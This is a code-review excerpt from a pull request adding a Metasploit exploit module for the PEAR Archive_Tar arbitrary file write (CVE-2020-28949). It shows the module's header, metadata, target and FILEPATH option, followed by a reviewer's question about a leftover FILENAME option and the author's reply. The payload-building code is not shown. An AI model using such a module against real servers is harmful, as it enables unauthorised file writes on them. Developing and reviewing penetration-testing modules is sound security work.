modules/exploits/multi/fileformat/archive_tar_arb_file_write.rb

```diff
@@ -0,0 +1,72 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/tar'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PEAR Archive_Tar < 1.4.11 Arbitrary File Write',
+        'Description' => %q{
+          This module takes advantages of Archive_Tar < 1.4.11's lack of validation of file stream wrappers contained
+          within filenames to write an arbitrary file containing user controlled content to an arbitrary file
+          on disk. Note that the file will be written to disk with the permissions of the user that PHP is
+          running as, so it may not be possible to overwrite some files if the PHP user is not appropriately
+          privileged.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'gwillcox-r7', # Metasploit module
+            'xorathustra', # Original advisory and PoC
+          ],
+        'References' =>
+          [
+            ['URL', 'https://github.com/pear/Archive_Tar/issues/33'],
+            ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28949'],
+            ['CVE', '2020-28949']
+          ],
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread',
+            'DisablePayloadHandler' => true
+          },
+        'Platform' => ['php'],
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+          [
+            ['Archive_Tar < 1.4.11', {}]
+          ],
+        'Privileged' => false,
+        'DisclosureDate' => '2020-11-17'
+      )
+    )
+
+    register_options([
+      OptString.new('FILEPATH', [true, 'The full path to the file to write on the target.', '/tmp/msf.php'])
```

Comment:
`show options` shows `FILENAME` as an option too, is that intentional? It doesn't seem to impact the module

```
msf6 exploit(multi/fileformat/archive_tar_arb_file_write) > options

Module options (exploit/multi/fileformat/archive_tar_arb_file_write):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME                   no        The file name.
   FILEPATH  /tmp/msf.php     yes       The full path to the file to write on the target.
```

Reply:
This was a default option caused by including the `Msf::Exploit::FILEFORMAT` mixin. I tried adding the `FILEPATH` option as I wanted to explain the option a bit more and note that it should be a full file path not a file name, but I didn't really have an option to do this. I'm open to suggestions here though as I realize that this is quite confusing and I would like to change it to something as accessible as possible.